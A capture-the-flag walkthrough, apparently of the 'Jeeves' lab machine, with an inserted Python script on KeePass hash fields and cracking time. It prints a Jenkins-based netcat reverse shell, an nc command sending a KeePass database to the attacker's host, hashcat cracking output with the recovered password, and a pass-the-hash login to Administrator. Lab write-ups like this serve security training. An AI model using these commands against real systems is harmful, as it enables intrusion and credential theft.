As always we start with an NMAP. The most obviously odd thing is port 50000, Jenkins.
Nmap scan report for 10.10.10.63
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-10-20 01:23:12
|_  start_date: 2019-10-20 01:21:48

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.72 seconds
If we run dirbuster against port 50000 we find the askjeeves folder.
Going in, it is a Jenkins admin console.
From there you can run Windows commands by creating a project. We download nc and have it call back to us.
root@Kali2:~/Downloads# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.63] 49677
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\kohsuke\Desktop>more user.txt
more user.txt
e3232272596fb47950d
To get admin you have to find the file CEH.kdbx (a KeePass database).
We transfer it from Windows to Linux with:
C:\Users\Administrator\.jenkins\workspace\a>nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx
nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx
We receive it with:
root@Kali2:~/Downloads# nc -lp 1235 >jeeves.kdbx
We extract the hash with John's keepass2john:
root@Kali2:~/Downloads# keepass2john CEH.kdbx
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
We copy everything except the "CEH:" prefix into a new file and crack it with hashcat and rockyou.
root@Kali2:~/Desktop# hashcat -m 13400 hashcatjeeves /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

Session..........: hashcat
Status...........: Running
Hash.Type........: KeePass 1 (AES/Twofish) and KeePass 2 (AES)
Hash.Target......: $keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea...47db48
Time.Started.....: Sat Oct 19 21:15:25 2019 (38 secs)
Time.Estimated...: Sun Oct 20 03:02:58 2019 (5 hours, 46 mins)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      688 H/s (15.90ms) @ Accel:256 Loops:64 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 25600/14344385 (0.18%)
Rejected.........: 0/25600 (0.00%)
Restore.Point....: 25600/14344385 (0.18%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5504-5568
Candidates.#1....: joey1 -> 220292

$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1
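As an added example (not part of the original writeup), here is a small Python script that splits the keepass2john line above into its header fields and, using the 688 H/s and 14,344,385 candidates hashcat reported, shows how the time to exhaust rockyou scales with the KDBX transform-round count, which is the setting the database owner controls. The field names follow keepass2john's output order, and the linear cost scaling with rounds is an assumption about AES-KDF.

```python
from dataclasses import dataclass

# Constructed for this example: the keepass2john line from the writeup above.
SAMPLE_LINE = (
    "CEH:$keepass$*2*6000*0*"
    "1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*"
    "3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*"
    "393c97beafd8a820db9142a6a94f03f6*"
    "b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*"
    "cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48"
)
# Byte lengths of the hex fields in a KDBX (version 2) line, in order.
FIELD_LENGTHS = {"master_seed": 32, "transform_seed": 32, "encryption_iv": 16,
                 "expected_start_bytes": 32, "contents_hash": 32}

@dataclass
class KeePassHash:
    transform_rounds: int  # AES-KDF work factor: the setting a defender controls
    algorithm: int         # cipher id as keepass2john emits it (0 = AES)
    master_seed: bytes
    transform_seed: bytes
    encryption_iv: bytes
    expected_start_bytes: bytes
    contents_hash: bytes

def parse_keepass_hash(line: str) -> KeePassHash:
    """Split a keepass2john KDBX line into its header fields (keyfile variant not handled)."""
    if not line.startswith("$keepass$"):
        line = line.split(":", 1)[1]  # drop the "<dbname>:" prefix keepass2john adds
    fields = line.split("*")
    if fields[0] != "$keepass$" or fields[1] != "2" or len(fields) != 9:
        raise ValueError("not a keepass2john KDBX (version 2) line without keyfile")
    blobs = dict(zip(FIELD_LENGTHS, (bytes.fromhex(f) for f in fields[4:])))
    for name, want in FIELD_LENGTHS.items():
        if len(blobs[name]) != want:
            raise ValueError(f"{name}: expected {want} bytes, got {len(blobs[name])}")
    return KeePassHash(int(fields[2]), int(fields[3]), **blobs)

def exhaust_seconds(rounds: int, wordlist_size: int = 14_344_385,
                    ref_rate: float = 688.0, ref_rounds: int = 6000) -> float:
    """Seconds to try a whole wordlist; defaults are hashcat's figures from this page.
    AES-KDF cost is linear in the round count, so the guess rate measured at
    ref_rounds drops proportionally for a database that uses more rounds."""
    return wordlist_size / (ref_rate * ref_rounds / rounds)

if __name__ == "__main__":
    h = parse_keepass_hash(SAMPLE_LINE)
    for r in (h.transform_rounds, 10_000 * h.transform_rounds):  # illustrative larger work factor
        print(f"{r:>10} rounds: rockyou exhausted in {exhaust_seconds(r) / 3600:.1f} h")
```

With the page's 6000 rounds the script reproduces hashcat's roughly 5.8 hour estimate for the whole wordlist; the same database with a 10,000 times larger round count would take years at the same rate.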
If we open it with keepass2 we can pull out the NTLM hash and pass the hash.
root@Kali2:~/Desktop# pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop>whoami
whoami
jeeves\administrator
And that's it. I hope the OSCP ones aren't this hard, ha. Anyway, that's another box done.